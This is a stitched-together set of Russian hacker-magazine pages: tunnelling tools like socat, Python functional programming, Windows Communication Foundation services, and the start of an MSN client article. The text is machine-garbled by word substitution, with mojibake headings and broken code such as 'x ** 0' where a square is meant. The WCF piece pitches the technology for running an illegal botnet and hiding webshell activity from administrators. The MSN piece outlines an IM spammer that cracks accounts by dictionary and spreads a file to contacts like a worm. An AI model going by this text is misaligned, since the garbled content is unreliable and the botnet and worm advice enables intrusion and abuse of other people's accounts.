возбраняется обнаружить до данный поры равно как самое меньшее десяток реализаций. Еще единовластно с немаловажных плюсов CIPE — его «дружба» со NAT и SOCKS.0.org). потому присутствие настройке альтернативы man просто-напросто нет. Официально поддерживаются 02-битные версии Linux равным образом Windows. Единственный огрех чтобы клиента. как-никак пакетец на любом случае дойдет до «кого-нибудь» изо группы серверов.1. Для примера поднимем TUN-сервер.up Команда «ifconfig tun0» покажет наличествование рабочего интерфейса. socat.tar.168.1.gz — 022 Кб cipe-1.org).org/socat/) обеспечивает двустороннюю переXÀÊÅÐ 00 /141/ 00 $ sudo socat openssl-listen:4444.z 107 . Ncat. использование UDP позволяет anycast «дружить» из NAT. Поддерживается автоматическая маршрутизация подле помощи Quagga.1. С ее через позволено несложно настроить прокси равным образом приспособляться ко удаленному сервису. а используя SSL — оградить сцепление в среде двумя socat.0. Пакет доступен на репозиториях основных дистрибутивов. как всегда сие одобрительно сказывается бери безопасности конечного решения. Для аутентификации используется RSA (1024 бит).tar. Cryptcat. позволяющая определить TCP/UDP-соединение от нужными параметрами. который нередко используется рядом организации подключения из труднодоступных мест. файловый дескриптор. равным образом экой протокол.7.0 SP3/SP6. В файле EXAMPLES. дачу данных в среде двумя различными каналами данных: сокет (UDP. Изначально CIPE разработан вместе с учетом применения во Linux.de/bigred/ devel/cipe.gz — 060 Кб Anycast Популярность VoIP да подобных сервисов ныне высока по образу никогда.2.168.pem.ru:4444. Anycast-рассылка позволяет клиенту малограмотный хлопотать по отношению работоспособности конкретного сервиса. socat (www. В репозитории Debian/Ubuntu программы нет. Реализация SATP да лежит на основе проекта anytun (anytun.

Можно написать так: Площадь круга (вариант первый) double area_of_circle(double r) { return M_PI*pow(r.. Языки: Haskell. следуя нескольким парадигмам. адрес достаточно или — или императивным (как во первом случае). è ñåãîäíÿ ìû ïîïðîáóåì ðàçîáðàòüñÿ. твоя милость неотменно следуешь какой-либо парадигме. твоя милость либо выбираешь самый счастливый язык. ñëåäóÿ íåñêîëüêèì ïàðàäèãìàì. ÊÀÊÈÅ ÏÀÐÀÄÈÃÌÛ?! ÄÀÂÀÉÒÅ ÊÎÄÈÒÜ! Когда тебе нужно настукать что-то. а просто-напросто потому. Рассмотрим пример. живей всего. что такое? C++ «заточен» перед сии парадигмы. Erlang. тож объектно-ориентированным (как изумительный втором). притом кое-когда ажно нескольким сразу. ÏÀÐÀÄÈÃÌÛ Как твоя милость еще догадался. } }.. Это происходит неграмотный ради отсутствия воображения. Èìïåðàòèâíîå ïðîãðàììèðîâàíèå «Сначала делаем это. например. Языки: Почти все Абсолютно понятная любому программисту парадигма: «Человек дает набор инструкций машине». тогда безо сих знаний твоя милость никогда не сможешь счислять себя профессиональным кодером. так ты. С императивной парадигмы безвыездно начинают учить/понимать программирование. Попробуем написать что-нибудь простое. cout << "Ïëîùàäü: "<< area_of_circle(r)<< endl. Ýòîò ïîèñòèíå ìîùíûé ÿçûê ïîçâîëÿåò ïèñàòü êîä. какую парадигму программирования выбрать.CODING Александр Краснощеко во â ÷åì æå ìåæäó íèìè ðàçíèöà. наше дело — программить :). } int main() { double r=5. либо сразу начинаешь кодить сверху своем любимом. предпочитаемом равным образом годами проверенном. а там чисто это». попозже это. } double area() { return M_PI*pow(this->r. несомненно равным образом в отношении работе в команде тебе тоже. однако токмо на правах отнюдь не старайся..2). программируя.. F# XÀÊÅÐ 00 /141/ 00 . что-нибудь со его помощью можно произвести — сие перетасовать ряд парадигм.2). Оно да верно. посчитаем жилплощадь круга. è êàêîé èç íèõ ëó÷øå ñëåäîâàòü. наверное. придется забыть. } void print_area() { 108 cout << "Ïëîùàäü: "<< this->area() << endl. больше всего делов заморачиваешься более или менее того. во зависимости через прямоты рук). держи одном да книжка но языке не возбраняется писать. И лучшее (или худшее. И все-таки. } А дозволительно равным образом так: Площадь круга (вариант второй) class Circle { double r. public: Circle(double r) { this->r=r. ну. Скорее.com ÊÎÄÈÌ ÍÀ PYTHON ÏÎ-ÔÓÍÊÖÈÎÍÀËÜÍÎÌÓ Ïîçíàåì ñèëó ôóíêöèîíàëüíîé ïàðàäèãìû ïðîãðàììèðîâàíèÿ ßçûê Python íå çðÿ ïîëüçóåòñÿ ïîïóëÿðíîñòüþ â ñðåäå ïðîãðàììèñòîâ Ãóãëà è ðåäàêòîðîâ Õàêåðà îäíîâðåìåííî :). Ôóíêöèîíàëüíîå ïðîãðàììèðîâàíèå «Считаем фраза равным образом используем вывод интересах чего-нибудь еще».} Можно равно по-другому. Рассмотрим основные их представители. int main() {(new Circle(5))->print_area(). нехай об идеологии думают идеологи.

>> coding DVD dvd На дискета автор этих строк положил свежие дистрибутивы питона ради виндусоидов. А до текущий поры не чета — напишем бери питоне :). на ведь а время. а потом подставляем x да получаем результат. data)) Оба примера получи и распишись питоне. Я сделано привел образчик аппликации на предыдущем листинге. Первым функциональным языком был Lisp. λ-èñ÷èñëåíèÿ Lambda исчисления — сие математическая концепция.python. Îáúåêòíî-îðèåíòèðîâàííîå ïðîãðàììèðîâàíèå «Обмениваемся сообщениями посредь объектами. не без; функциональным программированием на чистом виде я сталкиваемся редко. Ëîãè÷åñêîå ïðîãðàììèðîâàíèå «Отвечаем нате альтернатива поиском решения». несмотря на то автор этих строк равно малограмотный включил его во список функциональных языков. map(sq. Выглядит гружено! Абсолютно непонятная начинающему программисту парадигма. {çàäàåì âîïðîñ} ? witch(girl). org/wiki • Programming_ paradigm http://www. наоборот. а переменные служат в целях хранения сего состояния.y: x+y print reduce(sum. Такие функции называются функциями высших порядков. λ-исчисления основываются нате двух операциях: вышивка и абстракция. Мы описываем далеко не вереница состояний (как в императивной парадигме). XÀÊÅÐ 00 /141/ 00 ÄÂÓËÈÊÈÉ ÏÈÒÎÍ Нет лучшей теории. HTTP://WWW links • Несколько хороших ресурсов с целью тех. Языки: Prolog Логическое — изрядно специфическая штука. каковой наш брат применяем к иксу. нежели практика. предусматривает ряд действий надо данными. никак не действительно ли?). И весь смысл функционального программирования во том.. поскольку полностью моральный язычище — вдоволь специфичная и редко используемая штука. ÏÈÒÎÍ Â ÄÅÉÑÒÂÈÈ Оказывается. Это сродни математике — наш брат бесконечно пишем для доске формулу f(x). Посчитаем сумму квадратов элементов массива «data» в категорической форме равным образом функционально: Императивный Питон data=[.] sum=0 for element in a: sum +=element ** 0 print sum Функциональный Питон data=[. В так время. Языки: Почти все Появившись. Достаточно простого примера: Иллюстрация для фильму Монти Пайтона в Prolog’е {çàäàåì ïðàâèëà} witch(X) <=burns(X) and female(X). floats(X) <=sameweight(duck.com/ developerworks/ library/l-prog. Журнал согласно теме. концепции ФП реализованы во Питоне сильнее чем изящно. кому тянет узнать больше: http://www. что здесь теорема — сие инструмент. sameweight(duck. wooden(X) <=floats(X). На ООП построены утилитарно по сию пору современные бизнеспроцессы. хватит за глаза разукрасить командирский код элементами функционального. Линуксоидам помощь малограмотный нужна :). Императивное подразумевает вывод изменений состояния программы. Но если бы самочки «функционалы» равным образом малограмотный получили широкого распространения. Это безграмотный случайность. моделируя взаимодействия на реальном мире».wikipedia. сколько функции могут достигать на качестве аргументов да возвращать некоторые люди функции.org http://en. который вполне рекомендательно строчить полностью функциональный код..ibm.html INFO info Если тебе безвыгодный приглянулся питон. так отдельные идеи перекочевали с них в скриптинговые (и неграмотный только) языки программирования. во вкусе с головы кракер до определению знаком с императивным равным образом объектно-ориентированным программированием. интересная да безотчетно понятная. {çàäàåì íàáëþäåíèÿ} female(girl). Функциональное программирование.] sq=lambda x: x**2 sum=lambda x. X). не расстраивайся — ты можешь успешно применять идеи функционального программирования и на других языках высокого уровня. а вереница действий. Функциональное противопоставляют императивному. Ознакомимся не без; ними подробнее. беспричинно который нуте уж чтонибудь напишем. которая подразумевает.. Полностью функциональные языки используются чтобы всякого рода научных приложений равным образом все еще отнюдь не получили большого распространения. Функции map.. однако инда возлюбленный далеко не был без остатка функциональным (ставит на тупик. burns(X) <=wooden(X).girl). Оказалось. но. объектно-ориентированная модель прочно вошла на нашу жизнь. reduce — сие равным образом поглощать те самые функции 109 .

фактически. только у нас получился моментально скопление таких функций. ют по-над императивной парадигмой. Для увеличения производительности во ФП в свой черед используются ленивые вычисления. Яркий пример: print length([5. зависящей ото внутреннего состояния иной функции. Карринг — сие трансформация функции ото испарения аргументов во функцию. и разве твоя милость перешел ото ИП ко ООП. так компилятору вкушать идеже разгуляться. Такое отстаивание нимало никак не годится к функциональной парадигмы. 0+2]). Как ты да я сделано выяснили. Таким образом. В решение скажу пару слов об уровне абстракции. Нужна периметр списка — пожалуйста! Те но взгляды на вещи используются да на других языковых конструкций. нежели симпатия повыше — тем лучше. хватит политично воспользоваться ее во сочетании со императивной. 0/0. Так вот. разве функции отнюдь не зависят дружище через друга. Lambda-абстракция def add(n): return lambda x: x + n adds=[add(x) for x in xrange(100)] только одинокий раз. связанных со нежелательными значениями этих самых переменных. По идее. а значит. функции создают новые функции для основе своих аргументов. так чтобы адаптировать себя жизнь. Но ленивый автор питона не мудрствуя лукаво неграмотный способен определять значения каждого элемента списка. равно сие значит. Здесь функции рассматриваются вроде математические. ведь мы уменьшаем наличность ошибок. Вместе от счетом ошибок автор сих строк уменьшаем равно эпоха отладки программы. Он позволяет отделаться ото условных операторов да циклов… ну. всего-навсего возьми локальном уровне.z XÀÊÅÐ 00 /141/ 00 .. да равно дебагить такие функции незначительно проще. Что ж. что-то дает нам пока что порядком «степеней свободы». при случае пишем «чистые функции».append(x) else: L. этак в духе его об этом отнюдь не просили. которые позволяют нуждаться помимо громоздких конструкций будто if-elif-else. С помощью этого приема наш брат делаем в некоторой степени похожее нате утилизация глобальных переменных. буде функции независимы. Чистая цель — сие отправления вне побочных эффектов. так ее допускается посчитать 110 Ñïèñî÷íûå âûðàæåíèÿ è óñëîâíûå îïåðàòîðû Чтобы бытье да показались тебе медом. ежели функции далеко не зависят ото переменных окружения. Замыкание — сие описание функции. Что касается абстракции — тогда наоборот. получай выходе я должны произвести ошибку деления получи ноль. которые «апплицируют» (или применяют) переданную в качестве аргумента функцию ко на нос элементу списка (для map) либо — либо каждой последовательной паре элементов списка (для reduce). да ни аза отнюдь не сказал для ООП равно ФП. в таком случае медянка аккуратно ограничить ко минимуму. Но пуще только выгоды я получаем. Однако. • Во-вторых. добровольно совсем держаться функциональной парадигме. равным образом вот поэтому и есть совмещение ООП да ФП дает нам нынешний уровень. В нашем примере сие lambda x. который буржуи где-то равным образом называют — «syntactic sugar». ась? круг обязанностей может возвращать отличаются как небо и земля значения при одних равным образом тех но значениях аргумента получай разных стадиях выполнения программы. вместе с через инструментария питона позволяется оборотить объёмистый командирский клин стих во роскошный да функциональный. В принципе. да мы не без; тобой можем написать код. каждая изо которых прибавляет ко аргументу определенное число. Применение чистых функций дает нам фаланга преимуществ: • Во-первых. их дозволяется менять местами да даже если машинально распараллеливать. ваш покорнейший слуга безвыездно сезон говорил относительно императивную парадигму. а равным образом компилятор. твоя милость его ранее видел во предыдущем примере — сие adds=[add(x) for x in xrange(100)].append(-x) print L Функциональный код print [x**2>=50 and x or -x for x in xrange(10) if x%2==0] ÈÒÎÃÈ Как твоя милость еще понял. В этом маленьком примерчике вдобавок уместилась до этого времени двое интересных определений функционального программирования — обособление равно карринг. симпатия не зависит через своего окружения да безвыгодный изменяет его состояния. разработчики питона придумали специфический «подслащающий» синтаксис. ×èñòûå ôóíêöèè è ëåíèâûé êîìïèëÿòîð Императивные функции могут изменять внешние (глобальные) переменные. правда? Еще убирать такая штука. ООП — это.. вроде операторы and равным образом or. Здесь ты да я за единый вздох создаем равным образом инициализируем список значениями функций. Если цель зависит всего лишь с аргументов. ведь следующим шажком следует фигурировать использование ФП на ООП. кабы не избавиться. тот или другой работает далеко не всего-навсего не без; переменными. вслед что-то они да получили прозвище «чистые функции». берущую домашние доводы соответственно одному. adds[34](5) Здесь наша сестра создали опись функций. так равным образом со функциями. зависящие только от аргументов да других функций. В результате порядочно «степеней свободы» получает безвыгодный токмо программист.CODING Поддержка парадигм во языках программирования высших порядков. Императивный код L=[] for x in xrange(10): if x % 0==0: if x**2>=50: L. Также. на функциональной парадигме позволено распоряжаться функциями равно как угодно. Таким образом. Что да мы не без; тобой да сделали во примере. В следующие разы дозволено проэксплуатировать кэшированное значение. Удобно.

Реклама .

И кто такой сказал. http://defec.ru se rpri Entervices Se et . ведь питаться имеет совершенно открытые интерфейсы с целью функционирования вместе с другими системами лишенный чего каких- 112 либо ограничений для своей внутренней архитектуре. пропуск унифицированных локаторов ресурсов (URI). которая имеет модное наименование «cloud computing» — услуги предоставляется равно как сервис. С ростом функционала проектируемого приложения растет наличность его функциональных элементов. объекты AJAX равным образом JSON. Cloud Computing äîñòóïåí ìàññàì. предоставляются компьютерные заряд равным образом вычислительные мощности. Однако Microsoft никак не стала раздвигать фантазию разработчика одним «ремоутингом». а. Целый конфигурация технологий построения безопасных систем вместе с распределенной архитектурой. ход авторизации может XÀÊÅÐ 00 /141/ 00 . íî è ñàìûõ ÷òî íè íà åñòü ðÿäîâûõ ãðàæäàí. Ñåãîäíÿ ìû ðàññìîòðèì ñèñòåìó áûñòðîãî ðàçâåðòûâàíèÿ ðàñïðåäåëåííûõ ïðèëîæåíèé â äîìàøíèõ óñëîâèÿõ. à ðàñïðåäåëåííàÿ àðõèòåêòóðà òåïåðü ÿâëÿåòñÿ åñòåñòâåííîé ïîòðåáíîñòüþ íå òîëüêî êðóïíûõ îðãàíèçàöèé.N Ïÿòü «êèòîâ» WCF — ñîâîêóïíîñòü ìîùíåéøèõ òåõíîëîãèé Messaging g in t o m e R Windows Communication Foundation (WCF) WTF WCF? Web Servic es WS E Windows Communication Foundation: ñëîæíûå òðàíçàêöèîííûå ñèñòåìû ïî-áûñòðîìó Áóäóùåå íàñòàëî. значит. во томишко числе равным образом понятие упомянутой Remoting. вошли во круг фреймворка Windows Communication Foundation.com. сообщения SOAP). Теперь проблема разграничения доступа для административной части твоей бот-сети не ограничивается банальной передачей туман «логин:пароль» авторизационной форме. место которых уже далека ото классического представления. Модель программирования. во свою очередь. сочетает во себя необходимые пользу кого создания многофункциональных веб-приложений технологии обработки данных: содействие команд получения/изменения/вызова данных (GET равным образом POST). В рамках этой статьи автор продолжим входить в стоимость дела со спектром технологий платформы . так постоянно но остается ограниченным рамками архитектуры «клиент-сервер». поддержки и развертывания веб-служб. Имеются в свою очередь накопления обеспечения конфиденциальности.NET Remoting — принципу построения сетевых приложений. Эта технология также обеспечивает поддержку удобной работы на веб-среде. сколько подсчеты во облаке — рок крупных компаний? Однако инструментарий пользу кого программирования систем распределенных транзакций — малограмотный единственная круг WCF.NET Framework. который. нате основе которого да мы не без; тобой организовали полноценную систему распределенных вычислений. какой упрощает разработку сетевых приложений равным образом предоставляет широкий инструментарий в целях обмена данными в ряду клиентской равным образом серверной частью. Одна изо прошлых статей была посвящена .CODING Денис «c0n Difesa» Макрушин каждая с которых функционирует по принципу «доступна всем». целостности да аутентификации. входит на . Таким образом. Разработчику предоставляется единая мир создания. Более того. прослеживается стройность со технологией.NET Framework. которая чванно называется WCF WEB HTTP. крыша нескольких различных типов данных (документы XML.

Пусть как не быть известный «Сервис». Каждый объект кодируется уникальным URL. на общем случае представляющий собой обмен сообщениями в распределенной инфраструктуре запросы могут закрепляться удивительно получи стороне веб-службы. Непосредственное послание для ресурсам сервиса с помощью REST-подхода позволяет взмести степень конфиденциальности клиентской стороны. Подход REST (Representational State Transfer) — одно с двух SOAP.techdays. • http://defec. Рассмотрим организацию SOAP получай простом примере. как следует спроектированная политика разграничения доступа (бот. занимающейся поиском коллизии MD5-хешей. рассмотрим уловка для реализации сих архитектур. Короче говоря. организующего рассроченный поиск заветной «строчки» до известному MD5-хешу — задачи. где хранится огромное количество информации соответственно WCF. Теперь вернемся сам для WCF да посмотрим. тем никак не менее так или по-иному покупатель получает необходимые ему данные. В нашем случае Сервис предоставляет метод «GetBalance(int AccountID)» получения баланса на запрашиваемом аккаунте. гость. POST.NET Remoting: программим системы распределенных grid-вычислений». равно как во SOAP. получи и распишись особенностях решаемой задачи.servicesite. однако результаты проектирования системы во соответствии от этими подходами от начала до конца отличаются. админ. HTTP://WWW links • www. REST во этом плане больше практичен и отнюдь не требует специальных оптимизационных мероприятий. избрание того alias иного подхода должен быть основан. Таким образом. Клиент генерирует особенный представление равно отправляет его во составе HTTP-пакета Сервису: Структура SOAP-запроса //ñòàíäàðòíûå HTTP-çàãîëîâêè … SOAPAction: GetBalance … //SOAP-êîíâåðò <soap: Envelope xmlns: soap …> //òåëî SOAP-çàïðîñà <soap: Body> <GetBalance xmlns=…> <Account>2</Account> </GetBalance> </soap: Body> </soap: Envelope> Формат SOAP-ответа формируется аналогичным образом. например: www. зачем никак не скажешь что касается SOAP-аналоге. где происходит ближайший воздухообмен пакетами между клиентской да серверной частью. • www.ru — мой ресурс. называемых URI. Рекомендую разобраться на значении каждой строчки кода. а держи доступе для необходимым ресурсам от через их унифицированных локаторов. накануне всего. В распоряжении архитектора распределенных систем имеются неудовлетворительно подхода: SOAP равно REST. Данный архитектурный стиль построен возьми таких стандартах. полученные сообразно указанному URL. где-то как SOAP — классический подход. по образу HTTP. который плохо сказывается в масштабируемости задачи. около повторном обращении ко ним могут составлять кэшированы. Еще один аргумент малограмотный во пользу SOAP: непреложный разбор клиентом полученного XML-кода требует определенных трудозатрат. На начальный зрение сравнивать несущественна. XML. идеже ты можешь где раки зимуют вопросы да поделиться идеями. данные. требующие индивидуального подхода. ÄÂÀ ÑÀÏÎÃÀ… Для основные положения ознакомимся от двумя фундаментальными методиками организации кто хочешь распределенки.com/Accounts/2. во общем случае представляющий на вывеску обмен сообщениями во распределенной инфраструктуре. Для вызова методов и получения/изменения каких-либо данных происходит XÀÊÅÐ 00 /141/ 00 Схема организации подхода RESP обращение ко сервису вместе с через стандартных HTTPглаголов (GET. Например. Прежде нежели перейти ко обзору средств WCF для построения приложений со распределенной архитектурой. 113 .xakep.NET Remoting. Одной из реализаций данного подхода является еще упомянутая методика . какой коллекция инструментов предоставляется разработчику. DELETE).ru/ post/52434/— статья «. Кстати говоря.ru/ — официальный ресурс «мелокомягких». Акцент на этом подходе сделан невыгодный получи и распишись исполнении удаленных сервисов.>> coding Взаимодействие клиента равным образом сервиса основано возьми трех элементах оконечной точки проходить не вдаваясь в подробности без участия классической схемы из паролями. PUT. правоохранительный орган) на системе вместе с распределенной архитектурой — единственный с ключевых аспектов. да целиком и полностью нелегального ботнета. DVD dvd На диске тебя ждет пример клиентсервисного приложения. URI. предоставляющий методы со описанной на специальном формате структурой. лига grid-системы. требующих отдельного внимания. SOAP (Simple Object Access Protocol) — классический подход.

в духе пересчет сообщениями (запрос/ответ) либо их односторонняя отправка. WCF-прокси кодирует сии параметры. Рассмотрим описанные поступки бери примере создания метода службы.. WCF «по умолчанию» основан нате SOAP.} //ýêâèâàëåíòíàÿ îêîíå÷íàÿ òî÷êà â êîíôèãóðàöèîííîì ôàéëå public void DefineEndpointInConfig() {. кой достаточно посылать обработанные данные изумительный иностранный мир. 3. MSMQ равным образом др. } Как не грех срубить изо определения Контакта — на нем должно произойти уложение двух чисел. в качестве кого довольно претворяться в действительность связь из точкой. их адрес). добавляется этап подключения до протоколу HTTP да происходит запускание службы: .CODING Элементы подобно «Контакт» представляют с лица сумма операций. каковой реализует спешный функционал. так поглощать какие будут применяться держи транспортном уровне (например. добавляет необходимые атрибуты безопасности. имеющий во своем распоряжении схему обращения для методам сервиса. Однако.. Далее услуги на обратном порядке извлекает этот запрос. Все гениальное просто. генерирует запрашивание для какому-либо методу. в таком случае не грех распустить равным образом REST-подход. не задавайся говоря. XÀÊÅÐ 00 /141/ 00 . Каждый с сих элементов. Адрес (Address). Автоматически создается прокси (а смотри равным образом понятие Remoting’а!) и производится ассигнование ему запроса (списка параметров интересах обращения для методу). да возвращает вывод клиенту. в такой мере в качестве кого WCF-прокси самостоятельно организует сочленение не без; удаленной службой да педантично передаст тебе результаты выполнения удаленного метода. Объявление Контакта заключается во создании класса равным образом привязки к нему атрибута ServiceContractAttribute (и здесь Remoting). а вишь его реализация: Реализация Контракта public class AddService : AddIntPoint { public int Add(int x. соответствующим образом обрабатывает (согласно инструкциям метода).. чтобы последняя могла предоставлять в распоряжение потенциальным клиентам свои методы. если использовать только лишь доза определенных слоев. уточняющих их специфику. бизнес — далеко не в чем дело? иное. что-нибудь оконечная пиксел хорэ передавать внешней среде.. где происходят прикидки (на локальной машине иначе говоря черт-те где получи сервере в Зимбабве). определяющих то. ServiceHost sh=new ServiceHost(typeof(AddService)). Следующий адрес демонстрирует означивание оконечной точки: Определение Оконечной Точки public class WCFServiceApp { //ìåòîä îïðåäåëåíèÿ îêîíå÷íîé òî÷êè è çàïóñêà ñåðâèñà public void DefineEndpointImperatively() {. например. тот или другой принимает двуха аж числа и отправляет их сумму наоборот изумительный внешнюю среду: Прототип Контракта [ServiceContract] public interface AddIntPoint { [OperationContract] int Add(int x. В свою очередь. } } Теперь группировка AddService является классом WCF-сервиса да может быть вызван клиентской в известной степени удаленно. 114 Рассмотрим работа оконечной точки WCF-службы к того. Эти три атрибута определяют идея что-то около называемой «оконечной точки» сервиса. int y) { return x + y. отправляет в транспортный канал. путь класса.. По сути. int y). PasswordCrack (string MD5hash). ÅÑÒÜ ÊÎÍÒÀÊÒ! Схема организации подхода SOAP ÑÊÂÎÇÜ ÏÐÈÇÌÓ MICROSOFT Обмен данными в лоне WCF-клиентом равным образом WCF-сервисом основан получай так называемых «слоях». равно у моря погоды заветного результата. буде соответствующие опции заранее были активированы во конфигурационном файле. может обладать фаланга атрибутов.. Элементы в виде «Связывание» определяют. во свою очередь. TcpTransportBindingElement — ассигнование согласно протоколу TCP). Оконечная этап — «орган» сношения сервиса из внешним миром. Ее «Адрес». Контракт (Contract). как и потребно отмечаться атрибутом OperationContractAttribute. Ты можешь организовать ни получай волос все так же какой метод. В Windows Communication Foundation принимать три ключевых понятия: 1. Протоколом передачи Обмен данными между WCF-клиентом и WCF-сервисом основан на беспричинно называемых «слоях» . TCP. во вкусе ни странно.AddServiceEndpoint( typeof(AddIntPoint). Клиент. sh. данных может выпирать одинокий изо стандартных протоколов: HTTP. Именно пользу кого предоставления адресной информации предоставляемых ресурсов используется URI (унифицированный локатор ресурсов. 2.} } В функции DefineEndpointImperatively() объявляется индивидуум класса. определяет домицилий нахождения сервиса. Что самое примечательное — твоя милость малограмотный будешь замечать. Связывание (Binding). хорош ли проверяться исправность передачи сведения (о нежели свидетельствует присутствие элемента ReliableSessionBindingElement) да включена ли безобидность передачи SOAP-сообщений (наличие элемента SecurityBindingElement). и.

Ознакомившись вместе с теоретической составляющей равно не затрудняясь освоив базовые конструкции да детали конфигурации сервисной части. Предоставленный документация представляет с лица всего только вводную часть ко праздник длинной истории. Охватить детали той или — или не этот области. а значит. А днесь представь.z 115 . ты получаешь на свое приказ влиятельный орудие реализации своих самых распределенных идей. Это дает осуществимость отвлечься через канала передачи данных равно добавить масса потенциальных клиентских платформ за вычисление использования различных протоколов передачи данных. Кстати говоря. которая называется «WCF-сервис и сорок разбойников».. Таким образом твоя милость потенциально расширяешь спектр зараженных машин. почему? Потому в чем дело? твоя милость самоуправно делаешь в целях сего всегда возможное: обращаясь каждый в один из дней ко одному равно тому но сомнительному скрипту в области несколько раз после день.). неисполнимо во рамках одной статьи.Add(35. Задумайся. например. масштабируемость. безопасность. даже если твоя милость раскидаешь функционал своего вебшелла до его нескольким неприметным уголкам воззвание его частям. Да да мы вместе с тобой такой задачи накануне с лица равным образом далеко не ставили. мы создали пункт ради дальнейших исследований да непосредственного испытания майкрософтоской технологии во боевых условиях. сервисы могут уступать целую коллекцию оконечных точек. твоя милость можешь хронировать данные. насколько возрастет стадия твоей анонимности равным образом тайность операций на взломанном сервере. позволяет легко активировать/деактивировать дополнительные опции сервиса (настройки безопасности. предоставляют допустимость проэксплуатировать несколько различных каналов передачи данных (транспортов) равным образом методов. ×ÒÎ ÆÅ ÒÀÌ. То убирать автор можем поднять консольное употребление во виде сервиса. в духе памяти их палят да прикрывают. ÇÀ ÃÎÐÈÇÎÍÒÎÌ? К спектру технологий WCF дозволено подоспеть вместе с разных позиций: разработка. коими выступают придуманные тобою сервисы. контролирование целостности передаваемых данных равно т. К неграмотный не в этакий мере приятным особенностям WCF-сервисов также достаточно отнести полную самосильность ото IIS-сервера (в этом XÀÊÅÐ 00 /141/ 00 заключается орден через обычных веб-сервисов. Свои пишущий эти строки поуже реализовал и намерен поверить ими со тобой бери страницах нашего журнала. } } Аналогичным образом пациент хранит свою оконечную точку для поддержки рычаги из оконечной точной сервиса.Open(). может существовать повседневные манатки на распределенном состоянии окажутся несравнимо паче удобными.. Конфигурационный файл сервиса. Например. sh. работающих исключительно лещадь его управлением). поступающие с твоего основного ботнета да ботнета. работающего в области HTTPпротоколу. Вот. 0).п. .>> coding Обмен сообщениями в ряду Клиентом да Сервисом средствами WCF new WSHttpBinding(). Распределение может бытовать благодатно на все эквивалентно какой окружающей нас области. твоя милость оставляешь во логах веб-сервера избыточную информацию чтобы бдительного администратора. Следующий эпизод заключение иллюстрирует ход отправки сообщений клиентом оконечной точке AddIntPoint сервиса: public class WCFClientApp { //èíèöèàëèçàöèÿ êàíàëà ïåðåäà÷è äàííûõ public void SendMessageToEndpoint() { MathProxy proxy=new MathProxy(). основанного исключительно на мобильных платформах. int result=proxy. "http://localhost/AddService/Ep1"). взгляни держи близкие вебшеллы. Рассмотрев детали быстрой организации клиент-сервисной (именно сервисной) архитектуры. Вспомни. да твоя милость скажешь: «Как но я раньше по сего никак не додумался?». которой касается Windows Communication Foundation. Кто знает. склонный выше исходного кода.

просил их разбиться знаниями. Äàæå òå. êîìïüþòåðàõ). ïîëüçóþòñÿ ýòèì ìåññåíäæåðîì. на минута скачивания контактов комната может капитально задрыхший сверху небольшую толику секунд. Вот элементарный набор. 2. тем попроще обнаружить ламера не без; примитивным паролем).SignedOff — óäà÷íî âûøëè. òîæå ïîëüçóþòñÿ ìàéêðîñîôòîâñêîé ñèñòåìîé áûñòðûõ ñîîáùåíèé. В свое миг таким а образом распространялись вирусы по мнению почте. êòî ñèäÿò íà ìàêàõ (â ñìûñëå. Все бесполезно. то позволительно разобрать предмет контактов да послать обложка через имени ламера. затрагивающий цивилизованные страны (те. который может прийтись кстати во реальной жизни: • NameserverProcessor. È äàæå òå. Если некоторый повелся да запустил файл. 116 Еще одиночный прогноз — намалевать программу. например. работающих во MS. же гляди на днях возьми работе ми пришлось писать модуль. При этом самочки Microsoft до ходу пьесы притворилась Буратино. ÏÎËÇÓ×Àß ÒÂÀÐÜ Точек приложения к этой библиотеки бог не обидел — с легального софта до реализации различных противозаконных программулин. в таком случае получай нас свалилась бы куча проблем в области асинхронизации. Событий у класса изрядно много. На некоторое минута мы оставил попытки пронюхать относительно протокол. Если производить операцию синхронно. ÊÀÊ ÎÍÎ ÐÀÁÎÒÀÅÒ? Из сего подобает азбучная истина последовательность — хочешь въесться на спам-бизнес. Класс работает вместе с протоколом во асинхронном режиме. Если бог знает кто отзывается. что такое? во интернете отнюдь не так уж равным образом бездна информации в соответствии с этой теме. словно спамеров да червяков. com/p/msnp-sharp/).SignedIn — ìû âîøëè â ñèñòåìó. À â ÑØÀ? Êîíå÷íî. идеже у людей кушать деньги) — изучай их ПО. с что сие человек сделано — пишущий эти строки беседовал со сотрудниками компании. в таком случае оказалось. • Nameserver. Дело на том. Долгое минута сия книгохранилище лежала у меня на диске мертвым грузом. сиречь тем. Просто вызывай нужную функцию. Например. êîãäà ñîåäèíåíèå óäà÷íî óñòàíîâëåíî.info ÑÀÌÎÏÀËÜÍÛÉ MSN-ÊËÈÅÍÒ ÍÀ ÑÈØÀÐÏÅ Ãîòîâèì ïî÷âó äëÿ ñîçäàíèÿ àíòèàìåðèêàíñêîãî IM-ñïàìåðà Êàêîé ñàìûé ïîïóëÿðíûé IM-êëèåíò â Ðîññèè? Êîíå÷íî æå. да жди.google. а что-то около — токмо класс. которая полноте подбирать пароли ко аккаунтам с списка в области словарю. • Nameserver. работающих вона так: 1. ïðÿìî êàê XÀÊÅÐ 00 /141/ 00 . И вслед за сие разработчикам MSNPSharp определенно нужно пожать руку. MSN. Такая рассылание отработает стократ эффективнее.flenov. 3. Когда мы впервой (это было порядком давно) решил разобраться вместе с работой протокола Microsoft Messenger. Ну.CODING Михаил Фленов www. какой-никакой полагается был распространять сведения для MSN-клиенты. в отдельных случаях возлюбленная сгенерит соответствующее событие. искал во интернете блоги программистов. àñüêà. в таком случае таковой обложка рассылает себя дальше. Пытаемся выслать приглашения держи общения. êòî ñèäÿò íà ìàêàõ îïèéíûõ. равно радикально успешно. так пытаемся раскрутить пользователя принять и пустить файл.ConnectionEstablished — ãåíåðèðóåòñÿ. что если бы группировка работал во синхронном режиме. ÀÑÈÍÕÐÎÍÍÀß ÌÎÄÅËÜ Все на библиотеке крутится округ класса Messenger. да будет тебе известно их передачи данных. Если аккаунт взломан (а чем больше аккаунтов. скачал последнюю версию да разобрался из ней во пара счета. Я тута а вспомнил ради MSNPSharp. Некоторые команды выполняются очень долго. же через полгодика наткнулся возьми библиотеку MSNPSharp (http://code. ведь во спячку ушло бы безвыездно приложение. кто создается банально да вне параметров: Messenger messenger=new Messenger(). отчего что MSN’у сей поры доверяют.

>> coding

новое — сие славно забытое старое. Вспомним, как бы работал единовластно изо
самых нашумевших червей. Для взлома аккаунтов спирт использовал селекция паролей по части словарю, какой-никакой брал изо *nix-системы. Так на правах во те
эра в отношении безопасности бедно думали инда специалисты, кольчатка выигрышно
ломал системы.
Сейчас в рассуждении безопасности думают больше, хотя всего лишь специалисты равным образом продвинутые пользователи. Ламеров получай просторах нашей Сети до сей времени вновь
